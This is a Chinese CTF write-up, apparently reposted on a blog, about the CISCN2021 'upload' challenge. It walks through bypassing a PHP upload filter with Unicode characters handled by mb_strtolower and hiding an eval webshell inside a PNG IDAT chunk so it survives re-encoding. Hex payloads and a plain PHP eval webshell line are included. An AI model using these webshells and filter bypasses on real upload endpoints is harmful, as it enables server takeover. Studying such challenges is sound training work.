首页 > 其他分享 >[CISCN2021 Quals]upload

[CISCN2021 Quals]upload

时间:2023-03-15 22:14:01浏览次数:44  
标签:解压 name zip Quals upload ctf file die CISCN2021

文件上传

打开题目直接给出了源码

 <?php
 if (!isset($_GET["ctf"])) {
     highlight_file(__FILE__);
     die();
 }
 ​
 if(isset($_GET["ctf"]))
     $ctf = $_GET["ctf"];
 ​
 if($ctf=="upload") {
     if ($_FILES['postedFile']['size'] > 1024*512) {
         die("这么大个的东西你是想d我吗?");
    }
     $imageinfo = getimagesize($_FILES['postedFile']['tmp_name']);
     if ($imageinfo === FALSE) {
         die("如果不能好好传图片的话就还是不要来打扰我了");
    }
     if ($imageinfo[0] !== 1 && $imageinfo[1] !== 1) {
         die("东西不能方方正正的话就很讨厌");
    }
     $fileName=urldecode($_FILES['postedFile']['name']);
     if(stristr($fileName,"c") || stristr($fileName,"i") || stristr($fileName,"h") || stristr($fileName,"ph")) {
         die("有些东西让你传上去的话那可不得了");
    }
     $imagePath = "image/" . mb_strtolower($fileName);
     if(move_uploaded_file($_FILES["postedFile"]["tmp_name"], $imagePath)) {
         echo "upload success, image at $imagePath";
    } else {
         die("传都没有传上去");
    }
 }

这是文件上传的代码,但是限制了上传文件的大小、名字,名字中不能有c,i,h,ph,所以一些php、htaccess都不能用了,而且还不能抓包更改它的后缀

其中有一个imaeinfo的数组信息,主要是来自于getimagesize函数

 

 

 

也就是限制了高和宽都得是1

但是不知道文件上传的入口在哪,扫描一梭子

 

 

 

 

有用的就是example页面了,打开,也是给出了源码

 <?php
 if (!isset($_GET["ctf"])) {
     highlight_file(__FILE__);
     die();
 }
 ​
 if(isset($_GET["ctf"]))
     $ctf = $_GET["ctf"];
 ​
 if($ctf=="poc") {
     $zip = new \ZipArchive();
     $name_for_zip = "example/" . $_POST["file"];
     if(explode(".",$name_for_zip)[count(explode(".",$name_for_zip))-1]!=="zip") {
         die("要不咱们再看看?");
    }
     if ($zip->open($name_for_zip) !== TRUE) {
         die ("都不能解压呢");
    }
 ​
     echo "可以解压,我想想存哪里";
     $pos_for_zip = "/tmp/example/" . md5($_SERVER["REMOTE_ADDR"]);
     $zip->extractTo($pos_for_zip);
     $zip->close();
     unlink($name_for_zip);
     $files = glob("$pos_for_zip/*");
     foreach($files as $file){
         if (is_dir($file)) {
             continue;
        }
         $first = imagecreatefrompng($file);
         $size = min(imagesx($first), imagesy($first));
         $second = imagecrop($first, ['x' => 0, 'y' => 0, 'width' => $size, 'height' => $size]);
         if ($second !== FALSE) {
             $final_name = pathinfo($file)["basename"];
             imagepng($second, 'example/'.$final_name);
             imagedestroy($second);
        }
         imagedestroy($first);
         unlink($file);
    }
 ​
 }

extractTo:将完整的存档或给定的文件解压缩到指定的 目的地

unlink:删除文件

glob() 函数:返回匹配指定模式的文件名或目录。该函数返回一个包含有匹配文件 / 目录的数组

image-20230220103814687

imagecreatefrompng:成功时此函数返回图像资源标识符,错误时返回FALSE

imagesx() 函数用于获取图像的宽度

imagesy() 函数用于获取图像的高度

代码审计:需要上传一个zip文件,然后解压zip包里的图片到临时目录,再遍历目录找到图片,利用函数得到图片的长宽,然后将其放到一个新的文件中,并且将原图给删除了。

所以在图片尾写的马不能被再次写入新的文件中,得把马写到图片中

但是黑名单中已经将i给过滤了,得想办法绕过字符

先试了大小写、双写都不能绕过,得用uncoide绕过

可以用利用mb_strtolower解析漏洞来unicode字符代替绕过。

在这里插入图片描述

那接下来就是如何构建图片马,先上传一个图片马

在抓的包中修改图片大小,还有zip中的i

 #define width 1
 #define height 1

image-20230220194910268

但是并没有成功,看大佬的wp说是

失败的地方主要是图片马的缘故

先得下载这个脚本

 https://github.com/huntergregal/PNG-IDAT-Payload-Generator/

运行后得到一个payload

image-20230221100740716

再在这个网址修改payload

 https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')Raw_Inflate(0,0,'Adaptive',false,false)To_Hex('Space',0)

image-20230220200631767

修改payload,将<?=$_GET[0]($_POST[1]); 改为 [<?=EVAL($_ POST[1]); ?>X"的hex

 5B3C3F3D4556414C28245F504F53545B315D2938202020203F3E580000

再逆转一下

image-20230220202921754

 a39f67641d201612546f112e29152b21672253505050506f5f5310

之后更改代码,再次运行脚本

 

image-20230221100816662

再更改文件名和长宽的数据,发包

image-20230221100915380

但是在解压的时候出错了

image-20230221103411856

一开始以为是包发错了,又试了几次后发现是点的快了。点一次就会出结果,再执行的话就是会报错

image-20230221105141456

解压成功后打开ma.php

image-20230221105208042

成功打开,再连接蚁剑

最后拿到flag,而且这个flag藏得是真隐蔽啊

image-20230221105044281

 

 

在构造图片马的时候,按照常规来做的话

 塒NG
 <?php eval($_POST[a];?>

这是马的内容,然后压缩,上传,改包,这几步都没有问题

但是解压的时候

image-20230221112347875

以为没事,再拿蚁剑连接,还是有问题

 

 

一直在报错,而且目录显示不全

因为解压的时候提示不是png,那就把php改成png,包包括换个马,还是同样的报错

 

标签:解压,name,zip,Quals,upload,ctf,file,die,CISCN2021
From: https://www.cnblogs.com/zbclove/p/17220343.html

相关文章

  • 关于antd Upload上传预览模糊解决方法
    1.先看看转换的代码1.base64转换为文件dataURLtoFile(dataurl,filename){constarr=dataurl.split(',');constmime=arr[0].match(/:(.*?);/)[1];......
  • el-upload 文件上传
       :auto-upload="false"  是否在选取文件后立即进行上传  on-change   文件状态改变时的钩子,添加文件、上传成功和上传失败时都会被调用......
  • ==和equals的区别
    一、八大基本数据类型和引用类型1.1八大基本数据类型1.整数类型:byte、short、int、long2.小数类型:float、double3.字符类型:char4.布尔类型:boolean1.2引用类型类、......
  • 使用百度的webuploader实现多图片上传
    1.引入样式(需要下载webuploader,放到本地static目录)<!--使用百度提供的webuploader上传多图片--><!--上传图片的jscss--><linkrel="stylesheet"type="text/css"hre......
  • AppUploader教程:如何使用该工具制作Apple证书​
    AppUploader教程:如何使用该工具制作Apple证书​AppUploader下载安装操作​AppUploader是一款方便快捷的开发者工具,提供了多项实用的功能。本文将介绍AppUploader的下载和安......
  • AppUploader教程:如何使用该工具制作Apple证书
    ​ AppUploader下载安装操作 AppUploader是一款方便快捷的开发者工具,提供了多项实用的功能。本文将介绍AppUploader的下载和安装步骤,帮助您快速使用该工具。1.下载A......
  • 560. Subarray Sum Equals K
    560.SubarraySumEqualsK标签(空格分隔):leetcodearraymedium题目Givenanarrayofintegersandanintegerk,youneedtofindthetotalnumberofcont......
  • WebUploader上传文件夹的三种解决方案
    ​ 1、介绍enctypeenctype 属性规定发送到服务器之前应该如何对表单数据进行编码。enctype作用是告知服务器请求正文的MIME类型(请求消息头content-type的作用一样)1、......
  • == 和 equals 的区别是什么?yyyy
    1、equals():用来检测两个对象是否相等,即两个对象的内容是否相等。2、==:用于比较引用和比较基本数据类型时具有不同的功能,具体如下:(1)、基础数据类型:比较的是他们的值是否相......
  • DVWA 之 File Upload-文件上传
    五、FileUpload-文件上传文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞......